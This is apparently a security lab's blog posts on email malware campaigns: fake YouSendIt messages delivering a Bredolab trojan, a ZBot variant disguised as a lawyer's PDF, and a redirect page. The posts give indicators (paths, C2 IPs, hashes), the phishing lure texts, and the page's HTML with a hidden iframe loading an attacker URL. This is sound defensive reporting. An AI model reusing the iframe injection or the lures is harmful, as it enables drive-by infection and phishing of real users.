Messages with the YouSendIt Reader contains the Bredolab trojan


After our first report earlier today of the YouSendIt abuse that leads to a malicious payload and spam web site, MX Lab now intercepted messages with the subject “You have received a file from [email protected] via YouSendIt.” and the attachment YouSendIt_reader.zip.

The email address is spoofed and the email address in the subject line will change according to the from address.

The body of the email:

Maryellen Meier has sent you the following via YouSendIt

File attached to this letter.

YouSendIt, Inc. | Privacy Policy

1919 S. Bascom Ave., Campbell, CA 95008

The message has the attachment YouSendIt_reader.zip. Once extracted, the 20 kB large file YouSendIt_reader.exe is available.

The trojan is known as Gen:Variant.Bredo.2 (BitDefender, F-Secure, GData), TrojanDownloader:Win32/Waledac.C (Microsoft).

The following files are created:

%AppData%\1410506.exe
%Programs%\Security Tool.lnk
%Windir%\Temp\_ex-08.exe

New processes are created:

Process Name: 1410506.exe
Process Filename: %AppData%\1410506.exe

Process Name: _ex-08.exe
Process Filename: %Windir%\temp\_ex-08.exe

Process Name: 1410506.exe
Process Filename: %UserProfile%\LOCALS~1\APPLIC~1\1410506.exe

Several Windows registry modificatiosn are being made to the infected system and the trojan can establish an connection to the IPs 77.78.249.2 and 85.234.191.111 on port 80.

The trojan will also connect to the URL hxxp://77.78.249.2/cb_soft.php?q=a4867e4e00d394bf25ae3835341f22e3

At the time of writing, only 8 of the 42 AV engines at Virus Total did detect the treath.Virus Total permlink and MD5: 79be5ebc9659f2c4e2e85cdd3464720d.

New ZBot variant in messages with subject “YOUR SALE TO CAN PTY LIMITED”


MX Lab intercepted a new ZBot varaint in messages with the subject “YOUR SALE TO CAN PTY LIMITED” and the following body of the email:

Dear ****@****.de

Please find attached correspondence from Colby Young of even date.

Regards

Jillene Smith
Cantle Carmichael Lawyers
PO Box 483
(DX 7876 NEWCASTLE)
Newcastle, NSW, 2300
(P) 02 49 297 500
(F) 02 49 293 611

The email contains the attachment 08-05-2010(10).pdf.zip. Once extracted we found the 16 kB large file 08-05-2010(10).pdf.exe.

Virus Total permlink and MD5: f776ab24302503f7f6e924d0a24ae678.

YouSendIt abused in a malware and spam distribution


MX Lab intercepted a emails with the subject “You have received a file from [email protected] via YouSendIt.” that contains a potential risk of a malicious payload and redirects you to a Canadian Pharmacy web site. The email address in the subject line can be different depending on the spoofed senders address.

The message indicates that you have a file, in this case an audio file in MP4 format, for you to download at YouSendIt, the well known online file sharing and distribution web site.

The URLs in the message however, do not point to the YouSendIt web site but will lead to hxxp://carlaustiniii.org/x.html. When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.

The web site has the following HTML code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=hxxp://spruceteam.com">
</head><body>
<iframe src="hxxp://tartonion.ru:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>

We believe that at this stage that these messages have a malicious payload that could infect your computer. Afterwards we got redirected to hxxp://spruceteam.com/, the famous Canadian Pharmacy web site.

MX Lab has detected an increase in combined strategies during the last few weeks and months where emails leads to a web site with malicious code and exploits and then forward the user to a spam web site in the hope that the end user will not note that his computer is also infected with a trojan.

Follow

Get every new post delivered to your Inbox.

Join 1,609 other followers